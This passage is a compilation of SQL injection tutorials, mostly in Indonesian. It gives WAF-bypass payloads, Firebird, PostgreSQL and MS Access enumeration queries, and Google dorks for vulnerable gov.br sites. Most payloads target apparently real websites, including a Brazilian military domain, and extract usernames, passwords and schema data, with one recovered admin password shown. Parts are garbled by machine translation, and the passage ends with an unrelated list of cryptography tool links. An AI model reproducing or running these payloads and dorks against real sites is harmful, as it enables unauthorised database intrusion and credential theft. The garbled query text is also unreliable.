1572http://www.webshit.com/vulnscript.php?id=1+union--+- [waf]
1573
1574http://www.webshit.com/vulnscript.php?id=1+select--+- [No waf]
1575
1576brarti fungsi union di block .
1577kita coba bypass dngan kombinasi Uppercase dan lowercase .
1578
1579http://www.webshit.com/vulnscript.php?id=1+uNiOn--+- [waf Bypassed]
1580
1581atau klo masih kena Waf
1582
1583http://www.webshit.com/vulnscript.php?id=2 /*!uNiOn*/--+-
1584
1585atau
1586
1587http://www.webshit.com/vulnscript.php?id=1+/*!50000uNiOn*/--+-
1588
1589okay bypassed :D
1590
1591-------------------------------------
1592
1593tahap berikut nya Union Select
1594
1595http://www.webshit.com/vulnscript.php?id=1+union--+- [no waf]
1596
1597http://www.webshit.com/vulnscript.php?id=1+select--+- [no waf]
1598
1599tapi saat
1600
1601http://www.webshit.com/vulnscript.php?id=1+union+select--+- [Waf]
1602
1603brarti Waf block kombinasi kata union select ..
1604
1605kita bs bypass dgn
1606
1607http://www.webshit.com/vulnscript.php?id=1+union+distinctROW+select--+-
1608
1609atau
1610
1611http://www.webshit.com/vulnscript.php?id=1+union%23%0aselect--+-
1612
1613yuhuu Bypassed :D
1614
1615---------------------------------------
1616
1617Bypass dengan url Encode jg bs
1618
1619http://www.webshit.com/vulnscript.php?id=1+%75Nion+%73eLect--+-
1620
1621%75 = u
1622%73 = s
1623
1624----------------------------------------
1625
1626http://www.webshit.com/vulnscript.php?id=1+/*!50000union*/ DISTINCTROW /*!50000select*/+1--+- [no waf]
1627
1628http://www.webshit.com/vulnscript.php?id=1+/*!50000union*/ DISTINCTROW /*!50000select*/+1,2--+- [waf]
1629
1630Hmm ketika menambah (,) kena waf , brarti koma harus dibypass :D
1631
1632http://www.webshit.com/vulnscript.php?id=1+/*!50000union*/ DISTINCTROW /*!50000select*/+1,~~2--+- [bypassed]
1633
1634http://www.webshit.com/vulnscript.php?id=1+/*!50000union*/ DISTINCTROW /*!50000select*/+1,~~2,~~3,~~4,~~5--+- [bypassed]
1635
1636atau
1637
1638http://www.webshit.com/vulnscript.php?id=1+uNiOn(/**_**/(seLeCt(1),(2),(3),(4),(5))-- - [bypassed]
1639
1640atau dgn method join :v
1641
1642----------------------------------------
1643
1644beberapa injector menggunakan UnionOnOn / informationmation_schema_schema tnpa tau maksud query itu :p
1645
1646oke skrang kita cari tau :v
1647
1648live target :
1649
1650http://zixem.altervista.org/SQLi/level3.php?item=3'+union--+-
1651
1652hasil :
1653
1654You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'uni-- -'' at line 1
1655
1656dari situ kita bs liat kalau "on" pada "union" hilang :v
1657
1658bagaimana bypass nya ??
1659
1660tambahin aja on di union nya jadi unionon :v
1661
1662http://zixem.altervista.org/SQLi/level3.php?item=3'+unionon--+-
1663
1664wokee bypassed :D
1665
1666selanjutnya sperti biasa
1667
1668http://zixem.altervista.org/SQLi/level3.php?item=3%27+and+0+unionon+select+concat(%27versailles%20::%20%27,version()),2,4,5--+-
1669
1670###############################
1671Alternativ bypass union select jika langkah diatas blm bs bypass .
1672
1673uni<>on sel<>ect
1674
1675uni*on sel*ect
1676
1677(uni)(on) (sel)(ect)
1678
1679uni[]on sel[]ect
1680
1681uni\on sel\ect
1682###############################
1683
1684Thanks
1685
1686
1687
1688SQLI Tutorial - Beginners
1689
1690http://www.ikar.ru/eng/research.php?id=1+and+1=0+union+select+1,2,concat(Login,0x3a,Password,0x3a,Status),4,5+FROM+Users+limit+0,1
1691
1692http://www.njgsca.org/blog.php?id=-1+union+select+1,username,3,4,5,6,7%20from%20users
1693
1694-h
1695
1696SQL INJECTION BYPASSES TRICKS :)
1697
16981-?name=Thomas'%20GROUP%20BY%20100%20asc%23
1699
17002-?name=Thomas'-%20.1GROUP%20BY%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100%20asc%23
1701
17023-?name=Thomas'- .1/*!50000group*/%23aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
1703aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
1704aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
1705aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
1706aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
1707aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
1708aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
1709aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
1710aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
1711aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
1712aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
1713aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
1714aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%0aby --+%0A100;%00
1715
17164-?name=Thomas'- .1INTO @%60
17174,1-?name=Thomas'- .1INTO @,@%60
17184,2-?name=Thomas'- .1INTO @,@,@--
17194,3-?name=Thomas'- .1INTO @,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@
1720,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@
1721,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@ ;%00
1722
17235-?name=Thomas'- .1/*!50000group*//*** ^ ***/By --+%0A100;%00
1724
17256-?name=Thomas'orderby100--- (let me know if you get normal error here no waf)
1726
1727Retrieving Columns By Using PROCEDURE ANALYSE()
1728
17297-?name=Thomas' PROCEDURE ANALYSE() Get the first column's name
17307,1-?name=Thomas' LIMIT 1,1 PROCEDURE ANALYSE() Get the second column's name
17317,2-?name=Thomas' LIMIT 2,1 PROCEDURE ANALYSE() Get the third column's name
1732
17338-?name=Thomas',0;--+;%00 <<< Play Here With Zero Number >>> 0;--+;%00
1734
17350;--+;%00
17361;--+;%00
17372;--+;%00
1738
1739ETC.
1740
17419-?name=Thomas'%0D%0Aorder%0D%0Aby 100--
1742
174310-?name=Thomas'%0Bgroup%0Bby%0A1,2%23
1744
174511-?name=Thomas'/*!50000union*/-- (let me know if you get normal error here no waf)
1746
174712-?name=Thomas' or .0union/**/distinctrow%23GearFourthBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB%0aselect/**/distinctrow-1--
1748
174913-?name=Thomas'%23GearFourthBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB%0aunion-- (let me know if you get normal error here no waf)
1750
175114-?name=Thomas'%20And .0UnIOn--%20-%0ASeLe%43t-1--
1752
175315?name=Thomas'%75%6e%69%6f%6e--%20-%0%73%65%6c%65%63%74-1--
1754
175516-?name=Thomas'||!{f`id`}union-- a%0Aselect@--
1756
175717-?name=Thomas'||!{f`id`}/*!00000union*/-- (let me know if you get normal error here no waf)
1758
175918-?name=LlRob21hcydHcm95cCBieSAxMDAtLSAt (let me know what happen here)
1760
1761-rkx
1762
1763CATEGORIES: SQL INJECTION
1764
1765inurl:"gov.br" & inurl:"id=" & intext:"warning: mysql_fetch_assoc()
1766
1767inurl:"gov.br" & inurl:"id=" & intext:"warning: mysql_fetch_array()
1768
1769inurl:"gov.br" & inurl:"id=" & intext:"warning: mysql_num_rows()
1770
1771inurl:"gov.br" & inurl:"id=" & intext:"warning: session_start()
1772
1773inurl:"gov.br" & inurl:"id=" & intext:"warning: getimagesize()
1774
1775inurl:"gov.br" & inurl:"id=" & intext:"warning: is_writable()
1776
1777inurl:"gov.br" & inurl:"id=" & intext:"warning: unknown()
1778
1779inurl:"gov.br" & inurl:"id=" & intext:"warning: mysql_result()
1780
1781inurl:"gov.br" & inurl:"id=" & intext:"warning: pg_exec()
1782
1783inurl:"gov.
1784
1785You can change the domain what ever you want :)
1786
1787-h
1788
1789INTERBASE - FIREBIRDSQL
1790
1791http://www.hca.aer.mil.br/externo/index.php?pag=noticias/exibir_noticias.php?id=361/**/and/**/1=user
1792
1793http://www.hca.aer.mil.br/externo/index.php?pag=noticias/exibir_noticias.php?id=361/**/and/**/1=(select/**/first/**/1/**/rdb$field_name/**/from/**/rdb$relation_fields)--
1794
1795http://www.infomedia.by/image.php?operator=2)+and+1=2+union+select+rdb$field_name,2+from+rdb$relation_fields -
1796
1797http://www.infomedia.by/image.php?operator=2)+and+1=(select+first+1+rdb$relation_name+from+rdb$relation_fields) -
1798
1799http://www.infomedia.by/image.php?operator=2)+and+1=(select+first+1+distinct+rdb$relation_name+from+rdb$relations+where+rdb$system_flag=0) -
1800
1801http://www.infomedia.by/image.php?operator=2)+and+1=(select+first+1+skip+n+distinct+rdb$relation_name+from+rdb$relations+where+rdb$system_flag=0) -
1802http://www.infomedia.by/image.php?operator=2)+and+1=(select+first+1+skip+n+rdb$field_name+from+rdb$relation_fields+where+rdb$system_flag=0+and+rdb$relation_name=ascii_char(83)||ascii_char(85)||ascii_char(66)||ascii_char(83)) -
1803
1804http://www.infomedia.by/image.php?operator=2)+and+1=(select+first+1+skip+0+distinct+cast(id||name+as+char(777))+from+autor) -
1805
1806http://www.infomedia.by/image.php?operator=2)+and+substring((select+first+1+rdb$relation_name+from+rdb$relation_fields)+from+n+for+1)!=ascii_char(63)+and+(1=1))
1807
1808http://www.ppc4all.com/category.php?cat=(select+first+1+user+from+rdb$relation_fields)
1809
1810
1811rdb$relation_name - name of the table
1812rdb$system_flag - belong to the system table (a good way of screening, 1 = System)
1813rdb$field_name - obvious from the name
1814rdb$system_flag - the same
1815rdb$field_position - the serial number field
1816rdb$relation_name, rdb $ base_field - define table names
1817
1818©
1819-h
1820
1821Langkah-1: Memulai dengan Berbasis Union:
1822
1823Setiap db menggunakan prinsip yang sama untuk menarik data keluar dari db ofcourse itu pilih menggunakan nama kolom yang tepat.
1824
1825Saya tidak akan menjelaskan tentang pilih sebab yang saya tahu tentang itu.
1826
1827
1828Langkah-2: Memeriksa Target Untuk Vunl.
1829
1830Kode:
1831http://www.crookedtree.org/index.php?catid=583 '
1832
1833kesalahan telah terjadi dengan database! SELECT *
1834DARI bus_kategori
1835MANA id = 583 \ '
1836
1837Kesalahan MYSQL dengan MYSQL atau MS SQL dengan SQL atau ORACLE dengan ORA atau MS ACCESS dengan Jet dan
1838Peringatan: pg_exec () [function.pg-exec] <== PostgreSQL ATAU kesalahan seperti di atas.
1839
1840
1841Langkah-3: Mendapatkan Jumlah Kolom
1842
1843Untuk Mendapatkan kolom, kami menggunakan metode yang sama yang digunakan dalam urutan db lain dengan kami menggunakan - atau # untuk komentar.
1844
1845Kode:
1846http://www.crookedtree.org/index.php?catid=583 pesanan dengan 1-- <== tidak ada kesalahan
1847http://www.crookedtree.org/index.php?catid=583 pesanan oleh 2-- <== tidak ada kesalahan
1848http://www.crookedtree.org/index.php?catid=583 pesanan sebesar 3-- <== tidak ada kesalahan
1849http://www.crookedtree.org/index.php?catid=583 pesanan sebesar 4-- <== tidak ada kesalahan
1850
1851Kami akan melakukan increament of 1 hingga mendapatkan kesalahan dan kami memiliki kesalahan pada kolom ke-14.
1852
1853Itu berarti kita memiliki 13 kolom (error_column_num - 1) = 13.
1854
1855Metode lain mengeksekusi query dengan union dan masuk ke kolom I.E
1856
1857Kode:
1858http://www.crookedtree.org/index.php?catid=-583 union pilih null-- <== kesalahan
1859http://www.crookedtree.org/index.php?catid=-583 union pilih null, null-- <== kesalahan
1860http://www.crookedtree.org/index.php?catid=-583 union pilih null, null, null-- <== kesalahan
1861
1862Kami akan terus menambahkan nol hingga kami mendapatkan halaman kosong atau situs yang dimuat. Metode ini benar-benar anoying Big Grin.
1863
1864
1865Langkah-4: Mendapatkan Data untuk Kolom Visble.
1866
1867Istilah sebagian besar penggunaan ppl adalah kolom vuln. Sama seperti injeksi Oracle, kita akan menggunakan tipe data Null untuk kolom.
1868
1869Pertanyaannya adalah mengapa ????? Karena kita tidak tahu tentang datatype sehingga menggunakan datatype null akan melakukan trik untuk kita.
1870dan tentu saja beberapa situs memang memiliki nilai interger sehingga akan digunakan sebagai sebaliknya.
1871
1872Kode:
1873http://www.crookedtree.org/index.php?catid=-583 UNION PILIH null, null, null, null, null, null, null, null,
1874null, null, null, null, null--
1875
1876Sekarang dapat melihat halaman dimuat dengan kesalahan keluar (beberapa waktu dimuat tetapi konten yang hilang seperti di situs ini).
1877
1878Sekarang apa tapi tidak bisa melihat cetak coulmn di layar. Mari kita lanjutkan dengan nilai interger tetapi 0.
1879
1880Kode:
1881http://www.crookedtree.org/index.php?catid=-583 UNION SELECT 0, null, null, null, null, null, null, null,
1882null, null, null, null, null-- <== tidak ada kesalahan
1883http://www.crookedtree.org/index.php?catid=-583 UNION SELECT 0,0, null, null, null, null, null, null,
1884null, null, null, null, null-- <== tidak ada kesalahan
1885http://www.crookedtree.org/index.php?catid=-583 UNION SELECT 0,0,0, null, null, null, null, null,
1886null, null, null, null, null-- <== kesalahan
1887http://www.crookedtree.org/index.php?catid=-583 UNION SELECT 0,0, null, 0, null, null, null, null,
1888null, null, null, null, null-- <== kesalahan
1889
1890Akan terus mengganti nol dengan nilai interget "0" sampai mendapat kesalahan. Wow kami memiliki kesalahan pada kolom ke-3 dan ke-4, ada kolom lain yang juga tetapi kami berhenti di sini dan pindah ke langkah berikutnya.
1891
1892Ini yang kami cari.
1893
1894
1895Langkah-5: Mendapatkan Versi DB
1896
1897Sekarang permintaan kami akan sama dengan nol kecuali kolom keempat, akan menggantikannya dengan versi.
1898
1899Kode:
1900http://www.crookedtree.org/index.php?catid=-583 UNION SELECT null, null, null, version (), null, null, null, null,
1901null, null, null, null, null--
1902
1903PostgreSQL 8.2.9 pada x86_64-pc-linux-gnu, yang dikompilasi oleh GCC cc (GCC) 4.1.2 (Ubuntu 4.1.2-0ubuntu4)
1904
1905Sekarang sudah mendapat versi db Big Grin.
1906
1907
1908Langkah-6: Mendapatkan DBz dan Tabel Skema lainnya
1909
1910Saya akan memeriksa apakah target ini memiliki db lain atau tidak
1911
1912Kode:
1913http://www.crookedtree.org/index.php?catid=-583 UNION PILIH null, null, null, datname, null, null, null, null,
1914null, null, null, null, null DARI pg_database--
1915
1916AAA <== db
1917
1918kita hanya melihat satu database pada satu waktu, Sekarang apa yang harus dilakukan hmmm bagaimana menggunakan batas untuk mendapatkan orang lain Big Grin.
1919
1920Kode:
1921http://www.crookedtree.org/index.php?catid=-583 UNION PILIH null, null, null, datname, null, null, null,
1922null, null, null, null, null, null DARI pg_database LIMIT 1 OFFSET 1--
1923
1924LIMIT 1 OFFSET 1 <== nilai OFFSET. Jika kita terus mengubah nilai ini maka kita akan mendapatkan db Big Grin berikutnya seperti 1 2 3 .....
1925
1926Saya akan menjelaskan cara menggunakan db lain untuk injeksi di tutz lain. Sekarang kita akan pindah ke injeksi kami.
1927
1928Langkah-6.1: Sekarang Memperoleh Tabel Skema.
1929
1930Kode:
1931http://www.crookedtree.org/index.php?catid=-583 UNION PILIH null, null, null,
1932table_name, null, null, null, null, null, null, null, null, null DARI INFORMATION_SCHEMA.TABLES--
1933
1934buku tambahan
1935
1936Bad thing is cant concat hehehe aah jadi apa yang harus dilakukan sekarang. Kami harus menggunakan batas. Saya sudah jelaskan
1937bagaimana cara menggunakannya .
1938
1939Kode:
1940http://www.crookedtree.org/index.php?catid=-583 UNION PILIH null, null, null,
1941table_name, null, null, null, null, null, null, null, null, null DARI INFORMATION_SCHEMA.TABLES batas 1 offset 3--
1942
1943artist_entry
1944
1945ATAU Tabel Dari Skema DB Saat Ini
1946
1947Kode:
1948http://www.crookedtree.org/index.php?catid=-583 UNION PILIH null, null, null, table_name, null, null,
1949null, null, null, null, null, null, null DARI INFORMATION_SCHEMA.TABLES dimana table_schema = current_schema ()
1950limit 1 offset 0--
1951
1952buku tambahan
1953
1954Hanya
1955
1956MS-ACCESS INJECTION TUTORIAL
1957
1958Jadi kita akan memulai Penyuntikan Kita Secara Manual. Pertama kita harus memeriksa apakah situs Target kami Rentan. Jadi kita akan menggunakan Jenis Penginjeksian biasa dan menambahkan Single Quote 'di bagian akhir Parameter.
1959
1960dan Jalankan URL
1961
1962http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 '
1963Di sini kami mendapat ERROR! !
1964
1965KESALAHAN:
1966Kesalahan Microsoft JET Database Engine '80040e14'
1967Kesalahan sintaks dalam string dalam ekspresi query 'ID = 341' '.
1968/dettaglio-news.asp, baris 91
1969Jadi Target Kami Rentan. Sebelum Memulai Proses Lain terlebih dahulu, kami harus menyeimbangkan permintaan kami. Kami akan menggunakan Berbagai Komentar untuk menyeimbangkan Permintaan Kami.
1970
1971http://www.Vuln-Site.com/dettaglio-news.asp?ID=341--+ Kesalahan!
1972
1973KESALAHAN: Kesalahan sintaks (operator tidak ada) dalam ekspresi kueri 'ID = 341--'.
1974
1975http://www.Vuln-Site.com/dettaglio-news.asp?ID=341-- Lagi Kesalahan !!
1976
1977Sekarang, mari kita periksa null-byte ";% 00"
1978http://www.Vuln-Site.com/dettaglio-news.asp?ID=341;% 00 Kesalahan Hilang !!
1979jadi akan melanjutkan Injecting Kami Dengan menggunakan Null-Byte di bagian akhir Parameter.
1980
1981Sekarang kita harus menghitung Jumlah Kolom. Jadi Untuk Tujuan Ini kita akan menggunakan perintah ORDER BY Biasanya.
1982Mari Periksa Jumlah Kolom:
1983http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 pesanan sebesar 1;% 00
1984Tidak Ada Kesalahan. Halaman Dimuat Secara Normal!
1985
1986http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 pesanan sebesar 5;% 00
1987Sekali lagi Tidak Ada Kesalahan!
1988
1989http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 pesanan sebesar 8;% 00
1990Lagi halaman Loaded Biasanya!
1991
1992tetapi pada pesanan jam 9 kami sudah mendapat ERROR!
1993http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 pesanan sebesar 9;% 00
1994
1995KESALAHAN:
1996Kesalahan Microsoft JET Database Engine '80040e14'
1997Mesin database Microsoft Jet tidak mengenali '9' sebagai nama atau ekspresi lapangan yang valid.
1998/dettaglio-news.asp, baris 91
1999Jadi Ada 8 Kolom.
2000Sekarang Mari Siapkan perintah UNION BASED kami.
2001Setelah Melaksanakan Permintaan BERDASARKAN UNION Kami Punya KESALAHAN:
2002http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 Union Select 1,2,3,4,5,6,7,8;% 00
2003
2004KESALAHAN:
2005Kesalahan Microsoft JET Database Engine '80004005'
2006Input kueri harus berisi setidaknya satu tabel atau kueri.
2007/dettaglio-news.asp, baris 91
2008Di sini Comes The Main part.As jumlah kolom kami benar.jadi sepertinya Database adalah mysql 4.
2009Sekarang Kita Harus Menebak Tabel dan Kolom. Jadi Pertama-tama kita akan Tebak Tables.
2010
2011http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 Union Pilih 1,2,3,4,5,6,7,8 dari Login;% 00
2012itu memberi kita ERROR!
2013
2014KESALAHAN:
2015Kesalahan Microsoft JET Database Engine '80040e37'
2016Mesin database Microsoft Jet tidak dapat menemukan tabel input atau query 'login'. Pastikan itu ada dan namanya dieja dengan benar.
2017/dettaglio-news.asp, baris 91
2018itu artinya tabel ini tidak ada. Mari coba yang lain.
2019http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 Union Pilih 1,2,3,4,5,6,7,8 dari tabladmin;% 00
2020Masih Sama ERROR !!
2021Namun ketika kami mencoba Tabel ADMIN, Kesalahannya Sudah Hilang.
2022http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 Union Pilih 1,2,3,4,5,6,7,8 dari admin;% 00
2023Pada Tabel ADMIN, Kesalahan hilang dan kita dapat melihat Kolom yang Rentan di Halaman Web.
2024
2025Anda dapat melihat 2,3,6 adalah Kolom yang Rentan. Jadi sekarang kita harus Tebak Kolom. Kita akan menempatkan kolom-kolom kita di Kolom-kolom yang Rentan.
2026http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 Union Select 1,2, admin_id, 4,5,6,7,8 dari admin;% 00
2027Itu Memberi Kita Kesalahan!
2028
2029itu Memberi kami Password = "bEx0Th6
2030Jadi kami akan melakukan hal yang sama untuk situs lain untuk disuntikkan ke dalam basis data.
2031
2032MENGENAI SEMUA INJEKTOR: *
2033
2034
2035Menambahkan Tag HTML di Pertanyaan SQL - Tutorial oleh RAi Jee
2036Tag HTML dapat digunakan untuk banyak kesenangan dalam kueri SQL. Kita Dapat menggunakan Tag HTML untuk Membuat Hasil Penuh Warna di Output. Kadang-kadang kita menyuntikkan Situs dan Kolom yang Rentan ada di Judul atau di Halaman Sumber sehingga kita Juga Dapat Menggunakan Tag HTML Ada untuk Menunjukkan Output pada Halaman.
2037Jadi Kami Akan Mulai Menambahkan Tag HTML Untuk Membuat Output Beberapa Warna Penuh.
2038Berikut ini contohnya. Kami ingin Mencetak Versi dalam Warna MERAH Jadi Berikut adalah TAG HTML kami untuk Menampilkan Versi dalam Warna MERAH.
2039<font color = red>
2040
2041Concat (OUR_HTML_TAG, QUERY_HERE)
2042
2043mari Lihat Hasil. Sebelum Melaksanakan Query First Encode HTML TAG di Hex Value atau Use Single Quote Sebelum dan Sesudah Tag HTML Agar Dapat Dieksekusi
2044
2045http://www.kimclement.com/basiccal/event.php
2046? id = -444 'UNION SELECT 1,2,3,4,5,6, Concat (' <font color = red> ', versi ()), 8,9 - +
2047
2048Dan Anda dapat Lihat Versi dalam warna MERAH. jika kita ingin menggunakan Warna yang Berbeda untuk Setiap Perintah Seperti Menampilkan Versi dalam Warna MERAH, Basis Data dalam Warna Hijau, Pengguna dalam Warna Biru sehingga akan menggunakan Tag HTML yang berbeda untuk setiap Tugas.
2049Lihat Contoh.
2050Concat (Versi Warna MERAH, Basis Data dalam Warna Hijau, Pengguna dengan Warna Biru)
2051Tag HTML Untuk Setiap Tugas:
2052Warna merah: <font color = red>
2053Warna Hijau: <font color = green>
2054Warna Biru: <font color = blue>
2055Jadi Pertanyaan Terakhir Kami Untuk Menampilkan Setiap tugas dalam warna yang berbeda Akan menjadi,
2056Concat (<font color = red>, versi (), <font color = green>, database (), <font color = blue>, pengguna ())
2057Lihat Contoh.
2058http://www.kimclement.com/basiccal/event.php
2059? id = -444 'UNION SELECT 1,2,3,4,5,6, Concat (' <font color = red> ', versi (), 0x3a,' <font color = green> ', database (), 0x3a, '<font color = blue>', pengguna ()), 8,9 - +
2060
2061Dan Lihat gambar semua Tugas Lengkap. Dengan cara ini Anda Juga Dapat Menampilkan Tabel dan Kolom dalam Warna yang berbeda.
2062Setelah Menampilkan Perintah SQLi dalam Berbagai Warna.
2063Sekarang, mari kita lihat bagaimana kita bisa menampilkan data ketika kolom rentan kita di halaman sumber atau di TiTLE menggunakan HTML TAGS.
2064Ketika Kolom Rentan ada di Halaman Sumber.
2065Concat (STARTING_HTML_TAG, OUR_QUERY, ENDING_HTML_TAG)
2066jadi kami akan menggunakan TAG HTML ini untuk Menampilkan Data pada Halaman jika Kolom Rawan Kami ada di halaman Sumber.
2067
2068TAG HTML: Concat (<font size = "8" color = "red">, Versi (), </ font>)
2069
2070dan kadang-kadang Kolom Rentan kami ada di Judul sehingga dalam hal ini kami akan menggunakan Tag HTML ini untuk Mencetak Data di Halaman Web
2071
2072TAG HTML: Concat (</ title>, Version ())
2073
2074gunakan Tag HTML ini setelah pengkodean dalam Hex Value atau PUT Single Quote sebelum dan sesudah Tag HTML untuk membuat Query Executable.
2075
2076©
2077
2078When you try to access server with your SQL WAF will stop you again. You might have more luck if WAF controls only GET requests and you inject with POST.
2079
2080SQLi Waf Behaviours
2081
2082union select 1,2,3,4-- - [<---WAF
2083
2084/*!union*/ select 1,2,3,4-- - [<--- No WAF
2085
2086/*!union*/ select 1,group_concat(),3,4-- - [<--NO -WAF
2087
2088/*!union*/ select 1,group_concat(table_name),3,4-- - [<---WAF
2089
2090/*!union*/ select 1,group_concat(/*!table_name*/),3,4-- - [<--- No WAF
2091
2092/*!union*/ select 1,group_concat(/*!table_name*/),3,4 from -- - [<---No WAF
2093
2094/*!union*/ select 1,group_concat(/*!table_name*/),3,4 from information_schema.tables-- - [<---No WAF
2095
2096/*!union*/ select 1,group_concat(/*!table_name*/),3,4 from information_schema.tables where-- - [<---WAF
2097
2098/*!union*/ select 1,group_concat(/*!table_name*/),3,4 from information_schema.tables /*!where*/-- - [<---No WAF
2099
2100/*!union*/ select 1,group_concat(/*!table_name*/),3,4 from information_schema.tables /*!where*/ table_schema-- - [<---No WAF
2101
2102/*!union*/ select 1,group_concat(/*!table_name*/),3,4 from information_schema.tables /*!where*/ table_schema=database()-- - [<---No WAF
2103
2104-h
2105
2106Tools of Online Crytography
2107
2108HEADER AND POST DATA SQLI AND LOOKING DEEP INTO VULNERABLE SUCH AS XSS
2109https://www.hurl.it/
2110http://requestmaker.com/
2111http://headers.cloxy.net/
2112http://www.rexswain.com/
2113
2114http://www.cryptool-online.org/index.php?option=com_cto&view=tool&Itemid=139&lang=en
2115Base 64
2116enigmaco
2117http://www.swingnote.com/tools/texttohex.php
2118http://des.online-domain-tools.com/
2119
2120http://www.verexif.com/en/
2121http://www.extractmetadata.com/
2122http://metapicz.com/#landing
2123
2124https://www.google.co.kr/search?biw=1280&bih=617&q=cryptography+converter+online&oq=Cryptography+convert&gs_l=serp.1.1.0j0i22i30.2581.5076.0.7002.13.13.0.0.0.0.143.1345.5j8.13.0....0...1c.1.64.serp..0.13.1344.BK2uvc9iKTo
2125
2126Gematria Primus count: http://codeseekah.com/cicada/count.html
2127http://www.unit-conversion.info/texttools/hexadecimal/
2128XOR: http://md5decrypt.net/en/Xor/
2129http://www.braingle.com/brainteasers/codes/index.php
2130ASCII HEX DEC BIN converter: http://home.paulschou.net/tools/xlate/
2131
2132ASCI HEX DEC OCTAL converter: http://redir.dasumo.com/hex/
2133
2134Steganography software: http://www.jjtc.com/Steganography/tools.html
2135https://www.base64-image.de/
2136http://b64.io/
2137https://xcode.darkbyte.ru/
2138http://manytools.org/hacker-tools/steganography-encode-text-into-image/
2139http://decodebase64.com/
2140https://convertio.co/txt-jpg/
2141Anagram solver: http://www.ssynth.co.uk/~gay/anagram.html
2142
2143Rumkin old ciphers: http://rumkin.com/tools/cipher/index.php
2144PGP https://www.igolder.com/pgp/encryption/
2145http://www.hanewin.net/encrypt/PGdecode.htm
2146Exif:
2147http://www.garykessler.net/library/fsc_stego.html
2148AES, Salsa20, and Twofish
2149http://www.gematrix.org/
2150https://infotomb.com/m/welcome
2151http://morsecode.scphillips.com/translator.html
2152http://www.online-toolz.com/tools/text-encryption-decryption.php
2153http://www.unit-conversion.info/texttools/morse-code/
2154https://futureboy.us/stegano/
2155
2156-h
2157
2158BYPASSING ERROR
2159
2160Hmmm kita akan mulai dengan Injecting normal kami. Kami menemukan situs dari Google saat menyuntik dan rentan terhadap injeksi SQL.
2161Pertama kita akan menghitung jumlah total kolom.
2162
2163http://www.TARGET.com/product.php?id=35 pesanan sebesar 5-- -
2164
2165Tidak Ada Kesalahan!
2166
2167http://www.TARGET.com/product.php?id=35 pesanan sebesar 6-- -
2168
2169Sekali lagi Situs dimuat Biasanya dan Tidak Ada Kesalahan!
2170
2171http://www.TARGET.com/product.php?id=35 pesanan sebesar 7-- -
2172
2173Sekarang Kita Punya Kesalahan di sini
2174
